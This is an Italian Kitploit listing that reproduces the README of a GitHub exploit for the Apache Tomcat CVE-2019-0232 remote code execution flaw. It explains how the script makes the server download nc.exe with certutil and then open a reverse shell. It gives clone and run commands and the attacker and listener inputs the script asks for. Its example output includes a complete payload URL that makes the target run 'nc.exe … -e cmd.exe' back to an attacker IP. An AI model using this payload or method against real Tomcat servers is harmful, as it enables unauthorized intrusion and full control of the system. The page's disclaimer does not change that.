Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-0232 — Ciao, questo è un codice rivisto e migliorato per CVE-2019-0232 | Kitploit
Strumenti/GitHubGitHub/dharan10/cve-2019-0232
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubdharan10/cve-2019-0232

CVE-2019-0232

Ciao, questo è un codice rivisto e migliorato per CVE-2019-0232

Vedi Repository
221 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit per Apache Tomcat CVE-2019-0232

Questo script sfrutta la vulnerabilità CVE-2019-0232 in Apache Tomcat, che consente l'esecuzione remota di codice attraverso la gestione impropria dello script ism.bat. Lo script utilizza una tecnica di reverse shell tramite certutil e nc.exe (Netcat) per ottenere accesso remoto al sistema vulnerabile.

Panoramica della vulnerabilità:

  • ID CVE: CVE-2019-0232
  • Prodotti interessati: Apache Tomcat 6.x, 7.x, 8.x e 9.x
  • Descrizione:
    • CVE-2019-0232 è una vulnerabilità nella gestione da parte di Apache Tomcat delle richieste a ism.bat che potrebbe consentire agli attaccanti di eseguire comandi arbitrari sul server. Questa vulnerabilità si verifica a causa della mancanza di una corretta validazione dell'input utente, consentendo agli attaccanti di innescare l'esecuzione di comandi arbitrari tramite una richiesta appositamente predisposta.
    • La vulnerabilità può essere sfruttata per scaricare un file dannoso da un server remoto e utilizzarlo per avviare una reverse shell.
nc.exe

Requisiti:

  • Python 3: Lo script è progettato per Python 3.x.
  • Netcat: Un listener Netcat (nc.exe) deve essere ospitato su un server per la connessione reverse shell.
  • Apache Tomcat: Il server di destinazione deve eseguire una versione vulnerabile di Apache Tomcat (6.x, 7.x, 8.x o 9.x) suscettibile alla CVE-2019-0232.

Come funziona:

  1. Download di nc.exe: Lo script invia una richiesta appositamente predisposta al server Tomcat vulnerabile per scaricare il file nc.exe (Netcat) sulla macchina target usando certutil.
  2. Reverse Shell: Una volta scaricato nc.exe, viene inviata un'altra richiesta per eseguire il comando di reverse shell, che si riconnette al listener Netcat dell'attaccante.

Utilizzo:

1. Clona il repository:

root@kitploit:~
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232

2. Modifica lo script o eseguilo con input utente:

root@kitploit:~
python3 exploit.py

3. Ti verrà chiesto di inserire i seguenti dettagli:

root@kitploit:~
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.

Esempio:

root@kitploit:~
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe

Una volta eseguito con successo, dovresti avere una connessione reverse shell verso il tuo listener Netcat.

Dichiarazione di non responsabilità:

Questo script è destinato esclusivamente a scopo educativo. Non usarlo per attività malevole. Ottieni sempre la dovuta autorizzazione prima di tentare qualsiasi test di penetrazione o audit di sicurezza. L'uso improprio di questo script potrebbe comportare conseguenze legali.

Note importanti:

Assicurati che il server Apache Tomcat non sia stato patchato contro la CVE-2019-0232 prima di utilizzare questo exploit. Lo script potrebbe richiedere privilegi amministrativi a seconda della configurazione del sistema di destinazione.

Autore:

Autore: A!Z3N(Dharan) Fatto con potenza!

Licenza:

Questo progetto è concesso in licenza sotto la MIT License.

Tuttavia, usalo a tuo rischio. Questo codice è fornito solo a scopo educativo. Usando questo codice, accetti di assumerti la piena responsabilità di qualsiasi azione derivante dal suo utilizzo. L'uso improprio o non autorizzato di questo exploit può portare a conseguenze legali. Ottieni sempre la dovuta autorizzazione prima di eseguire qualsiasi test di sicurezza o test di penetrazione su qualsiasi sistema.

Sei libero di usare, modificare e distribuire questo codice, ma solo per scopi etici. L'autore non è responsabile per eventuali danni causati da questo codice.

Non utilizzare questo exploit senza l'esplicita autorizzazione del proprietario del sistema di destinazione.

Scarica lo strumento